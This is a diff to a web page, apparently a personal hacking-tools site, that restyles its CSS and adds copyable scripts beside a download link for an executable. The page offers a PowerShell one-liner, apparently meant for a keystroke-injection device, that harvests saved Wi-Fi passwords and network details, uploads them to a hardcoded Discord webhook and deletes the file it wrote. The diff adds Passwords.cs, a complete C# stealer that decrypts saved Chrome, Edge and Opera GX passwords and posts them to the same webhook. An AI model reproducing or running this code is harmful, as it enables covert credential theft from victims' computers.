--- a/index.html
+++ b/index.html
@@ -15,36 +15,34 @@
     html, body {
       height: 100%;
       font-family: 'Orbitron', monospace;
-      background: #111;
-      overflow: hidden;
+      background: #1a1a1a;
+      overflow-y: auto;
     }
     /* Particle background */
     #particles-js {
-      position: absolute;
+      position: fixed;
       width: 100%;
       height: 100%;
-      background: #111;
+      background: #1a1a1a;
       z-index: 1;
     }
     /* Main container styling */
     .content {
-      position: absolute;
-      top: 50%;
-      left: 50%;
-      transform: translate(-50%, -50%);
+      position: relative;
+      margin: 50px auto;
       z-index: 2;
-      width: 800px;
-      max-width: 90%;
+      width: 90%;
+      max-width: 1000px;
       padding: 40px;
-      background: rgba(0, 0, 0, 0.7);
-      border: 1px solid #39FF14;
+      background: rgba(0, 0, 0, 0.85);
+      border: 1px solid #66cc66;
       border-radius: 10px;
       text-align: center;
+      color: #66cc66;
     }
     .content h1 {
       margin-bottom: 30px;
       font-size: 2.5em;
-      color: #39FF14;
     }
     .buttons {
       display: flex;
@@ -58,16 +56,16 @@
     }
     .buttons button {
       background: transparent;
-      border: 2px solid #39FF14;
+      border: 2px solid #66cc66;
       padding: 15px 30px;
       font-size: 1.2em;
-      color: #39FF14;
+      color: #66cc66;
       border-radius: 5px;
       cursor: pointer;
       transition: background 0.3s ease, transform 0.3s ease;
     }
     .buttons button:hover {
-      background: rgba(57, 255, 20, 0.2);
+      background: rgba(102, 204, 102, 0.2);
       transform: scale(1.05);
     }
     /* Scripts Section */
@@ -77,22 +75,22 @@
     .scripts h2 {
       margin-bottom: 20px;
       font-size: 2em;
-      color: #39FF14;
+      color: #66cc66;
     }
     .script {
-      margin-bottom: 20px;
+      margin-bottom: 30px;
     }
     .script h3 {
       margin-bottom: 10px;
       font-size: 1.5em;
-      color: #39FF14;
+      color: #66cc66;
     }
     .script textarea {
       width: 100%;
-      height: 150px;
-      background: #222;
-      color: #39FF14;
-      border: 1px solid #39FF14;
+      height: 200px;
+      background: #2b2b2b;
+      color: #66cc66;
+      border: 1px solid #66cc66;
       border-radius: 5px;
       padding: 10px;
       font-family: 'Orbitron', monospace;
@@ -101,16 +99,16 @@
     .script button {
       margin-top: 10px;
       background: transparent;
-      border: 2px solid #39FF14;
+      border: 2px solid #66cc66;
       padding: 10px 20px;
       font-size: 1em;
-      color: #39FF14;
+      color: #66cc66;
       border-radius: 5px;
       cursor: pointer;
       transition: background 0.3s ease, transform 0.3s ease;
     }
     .script button:hover {
-      background: rgba(57, 255, 20, 0.2);
+      background: rgba(102, 204, 102, 0.2);
       transform: scale(1.05);
     }
   </style>
@@ -132,18 +130,281 @@
       <a href="https://bleh-xi.vercel.app/POWER.exe">
         <button>POWER.exe</button>
       </a>
-      <!-- More buttons can be added here -->
+      <!-- More file buttons can be added here -->
     </div>
 
     <!-- Scripts Section -->
     <div class="scripts">
       <h2>Scripts</h2>
+      <!-- Wifi Script -->
       <div class="script">
         <h3>Wifi Script</h3>
         <textarea id="wifiScript" readonly>$url="https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url  -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit</textarea>
         <button onclick="copyScript('wifiScript')">Copy Wifi Script</button>
       </div>
-      <!-- More scripts sections can be added here -->
+
+      <!-- Passwords.cs Script -->
+      <div class="script">
+        <h3>Passwords.cs<br /><span style="font-size:0.8em; color:#aaa;">(call from load with await Pass.ExtractAndSendPasswordsAsync();)</span></h3>
+        <textarea id="passwordsScript" readonly>
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Text;
+using System.Security.Cryptography;
+using System.Threading.Tasks;
+using System.Net.Http;
+using Newtonsoft.Json;
+using System.Data.SQLite;
+using Org.BouncyCastle.Crypto;
+using Org.BouncyCastle.Crypto.Modes;
+using Org.BouncyCastle.Crypto.Parameters;
+using Org.BouncyCastle.Crypto.Engines;
+
+namespace Big_Silly
+{
+    public static class Pass
+    {
+        // Replace with your actual Discord webhook URL.
+        private const string WEBHOOK_URL = "https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";
+
+        /// <summary>
+        /// Reads the Local State file for the given browser and returns the decrypted master key.
+        /// </summary>
+        public static byte[] GetMasterKey(string browser)
+        {
+            string localStatePath = string.Empty;
+            string userProfile = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
+            switch (browser.ToLower())
+            {
+                case "edge":
+                    localStatePath = Path.Combine(userProfile, @"AppData\Local\Microsoft\Edge\User Data\Local State");
+                    break;
+                case "chrome":
+                    localStatePath = Path.Combine(userProfile, @"AppData\Local\Google\Chrome\User Data\Local State");
+                    break;
+                case "opera":
+                    localStatePath = Path.Combine(userProfile, @"AppData\Roaming\Opera Software\Opera GX Stable\Local State");
+                    break;
+                default:
+                    return null;
+            }
+            if (!File.Exists(localStatePath))
+            {
+                // Could log that the browser was not found.
+                return null;
+            }
+            try
+            {
+                string jsonText = File.ReadAllText(localStatePath);
+                dynamic localState = JsonConvert.DeserializeObject(jsonText);
+                string encryptedKeyB64 = localState["os_crypt"]["encrypted_key"];
+                byte[] encryptedKeyWithPrefix = Convert.FromBase64String(encryptedKeyB64);
+                // Remove the first 5 bytes (the "DPAPI" prefix)
+                byte[] encryptedKey = new byte[encryptedKeyWithPrefix.Length - 5];
+                Array.Copy(encryptedKeyWithPrefix, 5, encryptedKey, 0, encryptedKey.Length);
+                // Decrypt the master key using DPAPI
+                byte[] masterKey = ProtectedData.Unprotect(encryptedKey, null, DataProtectionScope.CurrentUser);
+                return masterKey;
+            }
+            catch (Exception)
+            {
+                // Log the error if needed.
+                return null;
+            }
+        }
+
+        /// <summary>
+        /// Decrypts an individual password (stored as a blob) using the given master key.
+        /// </summary>
+        public static string DecryptPassword(byte[] encryptedData, byte[] masterKey)
+        {
+            try
+            {
+                // Validate the length: 3-byte prefix + 12-byte IV + (ciphertext + 16-byte tag) must be present.
+                if (encryptedData == null || encryptedData.Length < (3 + 12 + 16))
+                    return "";
+
+                // Skip the first 3 bytes (prefix)
+                int ivOffset = 3;
+                int ivLength = 12;
+                byte[] iv = new byte[ivLength];
+                Array.Copy(encryptedData, ivOffset, iv, 0, ivLength);
+
+                // Calculate the length of ciphertext (total length minus prefix, IV, and tag)
+                int tagLength = 16;
+                int cipherTextLength = encryptedData.Length - 3 - ivLength - tagLength;
+                if (cipherTextLength <= 0)
+                    return "";
+
+                // Extract ciphertext
+                byte[] cipherText = new byte[cipherTextLength];
+                Array.Copy(encryptedData, ivOffset + ivLength, cipherText, 0, cipherTextLength);
+
+                // Extract tag (last 16 bytes)
+                byte[] tag = new byte[tagLength];
+                Array.Copy(encryptedData, encryptedData.Length - tagLength, tag, 0, tagLength);
+
+                // Combine ciphertext and tag in one array as expected by BouncyCastle.
+                byte[] cipherTextWithTag = new byte[cipherTextLength + tagLength];
+                Array.Copy(cipherText, 0, cipherTextWithTag, 0, cipherTextLength);
+                Array.Copy(tag, 0, cipherTextWithTag, cipherTextLength, tagLength);
+
+                // Set up the cipher using BouncyCastle.
+                // Create an instance of the AES engine in GCM mode.
+                GcmBlockCipher cipher = new GcmBlockCipher(new AesEngine());
+                // 128-bit MAC size is standard for AES-GCM.
+                AeadParameters parameters = new AeadParameters(new KeyParameter(masterKey), 128, iv, null);
+                cipher.Init(false, parameters); // false for decryption
+
+                // Prepare a buffer to hold the decrypted output.
+                byte[] plainText = new byte[cipher.GetOutputSize(cipherTextWithTag.Length)];
+                int len = cipher.ProcessBytes(cipherTextWithTag, 0, cipherTextWithTag.Length, plainText, 0);
+                cipher.DoFinal(plainText, len);
+
+                // Convert the decrypted bytes to a UTF8 string.
+                return Encoding.UTF8.GetString(plainText).TrimEnd('\0');
+            }
+            catch (Exception ex)
+            {
+                // Optionally log the exception message.
+                Console.WriteLine($"Password decryption failed: {ex.Message}");
+                return "Decryption failed";
+            }
+        }
+
+        /// <summary>
+        /// Retrieves login credentials from the browser’s Login Data database.
+        /// </summary>
+        public static Dictionary<string, (string username, string password)> GetPasswords(string browser)
+        {
+            var passwords = new Dictionary<string, (string username, string password)>();
+            byte[] masterKey = GetMasterKey(browser);
+            if (masterKey == null)
+                return passwords;
+
+            string userProfile = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
+            string loginDataPath = string.Empty;
+            switch (browser.ToLower())
+            {
+                case "edge":
+                    loginDataPath = Path.Combine(userProfile, @"AppData\Local\Microsoft\Edge\User Data\Default\Login Data");
+                    break;
+                case "chrome":
+                    loginDataPath = Path.Combine(userProfile, @"AppData\Local\Google\Chrome\User Data\Default\Login Data");
+                    break;
+                case "opera":
+                    loginDataPath = Path.Combine(userProfile, @"AppData\Roaming\Opera Software\Opera GX Stable\Login Data");
+                    break;
+                default:
+                    return passwords;
+            }
+            if (!File.Exists(loginDataPath))
+                return passwords;
+
+            // Copy the locked database to a temporary file.
+            string tempFile = Path.Combine(Path.GetTempPath(), "Loginvault.db");
+            try
+            {
+                File.Copy(loginDataPath, tempFile, true);
+            }
+            catch (Exception)
+            {
+                // Log error copying the file if needed.
+                return passwords;
+            }
+
+            try
+            {
+                using (var connection = new SQLiteConnection($"Data Source={tempFile};Version=3;"))
+                {
+                    connection.Open();
+                    using (var command = new SQLiteCommand("SELECT action_url, username_value, password_value FROM logins", connection))
+                    using (var reader = command.ExecuteReader())
+                    {
+                        while (reader.Read())
+                        {
+                            string url = reader.IsDBNull(0) ? "" : reader.GetString(0);
+                            string username = reader.IsDBNull(1) ? "" : reader.GetString(1);
+                            byte[] encryptedPassword = (byte[])reader["password_value"];
+                            string decryptedPassword = DecryptPassword(encryptedPassword, masterKey);
+                            if (!string.IsNullOrEmpty(username) || !string.IsNullOrEmpty(decryptedPassword))
+                            {
+                                passwords[url] = (username, decryptedPassword);
+                            }
+                        }
+                    }
+                    connection.Close();
+                }
+            }
+            catch (Exception)
+            {
+                // Log query error if needed.
+            }
+            try
+            {
+                File.Delete(tempFile);
+            }
+            catch (Exception)
+            {
+                // Log deletion error if needed.
+            }
+            return passwords;
+        }
+
+        /// <summary>
+        /// Sends the collected passwords as a text file to the Discord webhook.
+        /// </summary>
+        public static async Task SendToWebhookAsync(Dictionary<string, (string username, string password)> passwords)
+        {
+            if (passwords == null || passwords.Count == 0)
+            {
+                // Optionally log that no passwords were found.
+                return;
+            }
+            StringBuilder sb = new StringBuilder();
+            foreach (var kvp in passwords)
+            {
+                sb.AppendLine($"URL: {kvp.Key}");
+                sb.AppendLine($"Username: {kvp.Value.username}");
+                sb.AppendLine($"Password: {kvp.Value.password}");
+                sb.AppendLine();
+            }
+            string content = sb.ToString();
+
+            using (var client = new HttpClient())
+            using (var form = new MultipartFormDataContent())
+            {
+                var fileContent = new StringContent(content, Encoding.UTF8, "text/plain");
+                form.Add(fileContent, "file", "passwords.txt");
+
+                HttpResponseMessage response = await client.PostAsync(WEBHOOK_URL, form);
+                // Optionally check the response status.
+            }
+        }
+
+        /// <summary>
+        /// Extracts passwords from Chrome, Edge, and Opera and sends the combined report via webhook.
+        /// </summary>
+        public static async Task ExtractAndSendPasswordsAsync()
+        {
+            var allPasswords = new Dictionary<string, (string username, string password)>();
+            foreach (var browser in new string[] { "chrome", "edge", "opera" })
+            {
+                var browserPasswords = GetPasswords(browser);
+                foreach (var kvp in browserPasswords)
+                {
+                    // If the same URL exists for multiple browsers, the last one will overwrite.
+                    allPasswords[kvp.Key] = kvp.Value;
+                }
+            }
+            await SendToWebhookAsync(allPasswords);
+        }
+    }
+}
+        </textarea>
+        <button onclick="copyScript('passwordsScript')">Copy Passwords.cs</button>
+      </div>
     </div>
   </div>
 
@@ -161,7 +422,7 @@
           }
         },
         "color": {
-          "value": "#ffffff"
+          "value": "#66cc66"
         },
         "shape": {
           "type": "circle",
@@ -196,7 +457,7 @@
         "line_linked": {
           "enable": true,
           "distance": 150,
-          "color": "#ffffff",
+          "color": "#66cc66",
           "opacity": 0.4,
           "width": 1
         },
@@ -262,7 +523,7 @@
       copyText.select();
       copyText.setSelectionRange(0, 99999); // For mobile devices
       navigator.clipboard.writeText(copyText.value).then(() => {
-        alert("Copied the script!");
+        alert("Script copied to clipboard!");
       }, (err) => {
         alert("Failed to copy the script.");
       });
